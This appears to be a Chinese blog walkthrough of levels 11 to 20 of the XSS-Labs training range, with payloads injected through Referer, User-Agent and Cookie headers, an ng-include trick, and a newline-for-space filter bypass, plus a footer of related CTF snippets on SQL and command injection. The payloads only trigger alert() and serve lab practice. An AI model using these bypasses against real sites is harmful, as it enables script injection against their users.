首页 > 其他分享 >《XSS-Labs》02. Level 11~20

《XSS-Labs》02. Level 11~20

时间:2023-10-04 09:56:11浏览次数:44  
标签:02 XSS 插件 20 xss 题解 Level sRc payload

@

目录


靶场部署在 VMware - Win7。

靶场地址:https://github.com/do0dl3/xss-labs

只要手动注入恶意 JavaScript 脚本成功,就可以证明 xss 漏洞存在。
最简单的验证方法:<script>alert("xss");</script>

索引

  • Level-11:Referer 头传递 payload。
  • Level-12:User-Agent 头传递 payload。
  • Level-13:Cookie 头传递 payload。
  • Level-14:图片 exif xss 漏洞。
  • Level-15:ng-include 利用。
  • Level-16:换行(%0a)代替空格绕过。
  • Level-17:flash 插件与 embed 标签。
  • Level-18 ~ 20:flash 插件相关 xss 漏洞。

Level-11

题解

先看看网页源码。

在这里插入图片描述

<input> 标签有四个值,都做了隐藏处理。其中第四个名为 t_ref 的标签是 http 头中 referer 的参数。

先 GET 与 POST 传参测试一下前三个标签能不能传值。

GET:

url + ?t_link=" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()> &#106;&t_history=" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()> &#106;&t_sort=" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()> &#106;

POST:

t_link=" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()>&t_history=" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()>&t_sort=" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()>

结果是都不能赋值。那就只能通过 referer 头传递 payload。

Referer: " onfocus=javascript:alert() type="text

在这里插入图片描述

Level-12

题解

看一眼源码。一眼 User-Agent 头。

在这里插入图片描述

那就直接上 payload。

User-Agent: " onfocus=javascript:alert() type="text

在这里插入图片描述

Level-13

题解

与 Level-11 和 Level-12 类似。利用 Cookie 头构造 payload。

Cookie: user=" onclick=alert() type="text 

在这里插入图片描述

Level-14

题解

这题会定时转跳到一个已经挂了的网站。

看了其他文章,有关图片 exif xss 漏洞。反正这题是没法做了,了解一下即可。

《xss-labs靶场-第十四关 iframe和exif xss漏洞》
https://www.freebuf.com/articles/web/282983.html

《XSS挑战之旅--游戏通关攻略》
https://xz.aliyun.com/t/1206?accounttraceid=74ab404d-2a01-4a1c-8b87-36ad367dbe11#toc-12

Level-15

在这里插入图片描述

题解

查看源码,可以看到传递的参数在代码中的位置。

在这里插入图片描述

ng-include:就是文件包含的意思,用来包含外部文件,如果包含的内容是地址,需要加引号。可以无视 html 实体化。

包含第一关看看,这里根据实际路径进行更改。

url + ?src='/lab/xss/level1.php'

在这里插入图片描述

所以可以包含之前的一关并对其传参来进行 xss。

这里不能包含直接弹窗的代码,如 <script>,但是可以利用能间接弹窗的代码,比如 <a><input><img><p> 标签等。

payload

url + ?src='/lab/xss/level1.php?name=<img src=level15.png onm ouseover=alert()>'

Level-16

题解

先测试一下关键字:

url + ?keyword=" ' sRc DaTa OnFocus onm ouseOver onm ouseDoWn P <sCriPt> <a hReF=javascript:alert()> &#106; 

在这里插入图片描述

过滤了很多东西,【/】也被过滤了,空格也被 html 实体化。

不过可以使用回车换行(%0a)代替空格。

payload

url + ?keyword=<svg%0Aonload=alert(1)>

Level-17

题解

这题主要考察 flash。需要使用支持 flash 插件的浏览器。也考察 embed 标签。

解题方法没什么新颖的。

可以参考:

《xss-labs靶场实战全通关详细过程》
https://blog.csdn.net/l2872253606/article/details/125638898

Level-18~20

题解

没想到最后几关都是有关 flash 插件的,甚至还涉及反汇编......

直接参考大佬文章吧,毕竟 flash 插件可以认为是过时了......

《xss-labs靶场实战全通关详细过程》
https://blog.csdn.net/l2872253606/article/details/125638898

Adobe 公司宣布将于 2020 年停止支持 Flash Player,因为 Flash 插件存在许多安全漏洞和缺陷,对于计算机和浏览器存在潜在的安全风险。
大多数现代浏览器已经默认禁用了 Flash 插件。


若问相思甚了期,除非相见时。

——《长相思》(宋)晏几道

标签:02,XSS,插件,20,xss,题解,Level,sRc,payload
From: https://www.cnblogs.com/GCom/p/17741977.html

相关文章

  • [SUCTF 2019]EasySQL 1
    原理||的不同功能,连接字符串和或堆叠注入解题过程进入靶场,按常规进行注入,发现过滤了很多关键字,跑一下fuzz试试堆叠注入payload:1;showtables;得出放flag的表,但flag字段被过滤了。看wp原代码查询语句是select$_POST['query']||0fromflag;但我们不知道源码....从尝试......
  • GDCPC2023 J X Equals Y
    洛谷传送门Gym传送门当时在GDCPC现场是这题首杀。20min就会了,但是2h才有电脑写(观察到至多\(50\)组数据满足\(\max(x,y)>10^6\),考虑一些根号做法。当\(f(x,a)\)的长度\(\ge3\)时,\(a\le\sqrt{x}\),因此可以暴力做,先找出所有\(f(x,a)\),再找出所有\(f(y,b......
  • 每日总结2023/10/03(c#安装教程)
     C#,入门教程(01)——VisualStudio2022免费安装的详细图文与动画教程_visualstudio2022安装c#教程-CSDN博客......
  • 02 快速排序(快排)
    #include"stdio.h"voidQuickSort(int*array,intlow,intheight){inti,j,tmp;//两个哨兵,和开头的元素下标inttemp;i=low;j=height;tmp=array[low];if(i>j)//如果下标i大于下标j,函数结束运行{return;}......
  • stm32f103-2023-10-03
    这是当时在“某知道”上自己的一篇原创回答,由于某些原因目前个人在该平台上的所有回答或隐藏或清空了,现经删整之后收纳回本人博客。======================================================================================问题链接:https://zhidao.baidu.com/question/1604602......
  • [GXYCTF2019]Ping Ping Ping 1
    原理RCE命令执行的多种绕过姿势解题过程进入靶场提示要传递参数ip那就传递一下127.0.0.1,结果正常试试进行拼接,试了127.0.0.1&&ls或者127.0.0.1&ls都不行,,,直到用;做连接符才可以payload:127.0.0.1;ls发现有index.php和flag.php文件,猜测flag应该在flag.php内接着尝试读取......
  • 2023 ICPC 香港
    gym开场发现E是传统数据结构题很高兴,不过先跳了。F知道相邻两段的长度差\(\le1\),以为最终每段长度只有\(\lfloor\frac{n}{m+1}\rfloor,\lceil\frac{n}{m+1}\rceil\)两种,那就可以DP了,队友签完HA我上去写,呼救两次后WAontest2,gjk说不相邻的两端长度差不一定\(\le1......
  • [ACTF2020 新生赛]Exec 1
    原理linux系统命令的使用命令执行漏洞解题过程打开靶场发现有ping功能,猜测是涉及命令执行漏洞,根据题目的Exec也能看出回来,先试试ping127.0.0.1,没问题接着使用&连接符执行多条系统命令,执行了ls命令,发现只有index.php,猜测flag是在根目录那里,所以我们就是用ls/来找出flagpa......
  • 20213227《计算机基础与程序设计》第一周学习总结
    作业信息1.作业属于哪个课程:https://edu.cnblogs.com/campus/besti/2023-2024-1-CFAP2.这个作业要求在哪里:https://edu.cnblogs.com/campus/besti/2022-2023-1-CFAP/homework/127543.作业的目标:快速浏览教材《计算机科学概论》,提出自己不懂或最想解决的问题4.作业正文:第一章......
  • 题目:2019年5月发布的四川旅游国际形象
    问题:2019年5月发布的四川旅游国际形象新标识中的动物元素是()。A.小熊猫B.大熊猫C.金丝猴参考答案如下,发送题目到公众号学哈,自动回复答案解析:四川旅游国际形象新标识于2019年5月发布,其中的动物元素是大熊猫(选项B)。大熊猫是四川的特有物种,也是中国的国宝之一,因此在四川旅游形象标识中......